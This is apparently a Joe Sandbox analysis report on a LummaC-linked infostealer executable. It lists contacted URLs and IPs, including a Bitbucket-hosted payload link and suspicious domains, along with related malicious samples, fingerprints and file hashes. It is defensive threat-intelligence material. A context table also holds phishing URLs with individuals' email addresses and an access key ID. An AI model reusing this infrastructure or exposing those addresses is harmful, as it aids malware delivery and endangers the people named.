                                                                                                                                                                                                              https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://sustainskelet.lat:443/apisjSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://help.steampowered.com/en/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://steamcommunity.com/market/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://store.steampowered.com/news/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYijSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=ejSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascriptjSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://bitbucket.org/fjSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://steambroadcast.akamaized.nPjSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://recaptcha.net/recaptcha/;jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netjSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              https://steamcommunity.com/discussions/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                https://store.steampowered.com/stats/jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amjSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                    104.21.66.86
                                                                                                                                                                                                                                                    		lev-tolstoi.comUnited States
                                                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    23.55.153.106
                                                                                                                                                                                                                                                    		steamcommunity.comUnited States
                                                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                    185.166.143.49
                                                                                                                                                                                                                                                    		bitbucket.orgGermany
                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                    52.216.152.124
                                                                                                                                                                                                                                                    		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse

                                                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                    Analysis ID:1579761
                                                                                                                                                                                                                                                    Start date and time:2024-12-23 08:39:37 +01:00
                                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                    Overall analysis duration:0h 6m 20s
                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:10
                                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                    Sample name:jSFUzuYPG9.exe
                                                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                                                    Original Sample Name:820f418e980b172684fe96e4aa6e50a5.exe
                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@2/5@13/4
                                                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                                                                    • Number of non-executed functions: 1
                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.89.179.12, 13.107.246.63, 4.245.163.56, 20.190.147.4
                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                    • Execution Graph export aborted for target jSFUzuYPG9.exe, PID 7428 because there are no executed function
                                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                                    02:40:34API Interceptor46x Sleep call for process: jSFUzuYPG9.exe modified
                                                                                                                                                                                                                                                    02:41:40API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                    • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                                    23.55.153.106HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                    TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        • jasonj002.bitbucket.io/

                                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        bitbucket.orgmG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        s3-w.us-east-1.amazonaws.commG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.136.89
                                                                                                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 16.182.101.249
                                                                                                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.67.100
                                                                                                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.18.140
                                                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.203.57
                                                                                                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 16.182.37.145
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.216.41.233
                                                                                                                                                                                                                                                                        https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                                                                                                                        • 52.217.128.241
                                                                                                                                                                                                                                                                        https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                                                                                                                                        • 52.216.142.68
                                                                                                                                                                                                                                                                        steamcommunity.comHK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        AKAMAI-ASN1EUHK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        AMAZON-02USmG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.67.100
                                                                                                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.18.140
                                                                                                                                                                                                                                                                        armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 54.203.164.5
                                                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.203.57
                                                                                                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                                                                                        AMAZON-02USmG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.67.100
                                                                                                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.18.140
                                                                                                                                                                                                                                                                        armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 54.203.164.5
                                                                                                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 52.217.203.57
                                                                                                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                                                                                        CLOUDFLARENETUSHK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                                                                                                        FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                                                        w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                                                        pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                                                                                                        0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.36.201
                                                                                                                                                                                                                                                                        0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 172.67.199.72

                                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                                                                                                        QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                                                                                                        FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                                                                                                        w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                                                                                                        pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                                                                                                        0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                                                                                                        0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                                                                                                        • 52.216.152.124

                                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_jSFUzuYPG9.exe_89e0a2a224744ed9d773cdd526d4b8ba975a_428023ae_40004372-aeb3-4959-98da-6976da283c96\Report.wer

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0441240916950452
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:LMFMTroqFe6asHhroI7JfYQXIDcQvc6QcEVcw3cE/3+HbHg/8BRTf3Oy1oVazW0B:YaTr1a20BU/QjudxWfzuiFlZ24IO8Y
                                                                                                                                                                                                                                                                        MD5:FF72212B19E055C0BD50077361089F14
                                                                                                                                                                                                                                                                        SHA1:1D200A52C547518FC6950A54B158A96D36A8D60C
                                                                                                                                                                                                                                                                        SHA-256:E2530A89CC5A8D8913FCCCC6E81F0743AF9383545E1A6CCF15A33EB550C158B3
                                                                                                                                                                                                                                                                        SHA-512:E9994CAD69257068BF723C52FED5B2E6680D7DA694A655ADE2929BA1940F51150C02DB54B579A2A5337D3B72E40390452C582F67550DD551A9010F7080F4C695
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:low
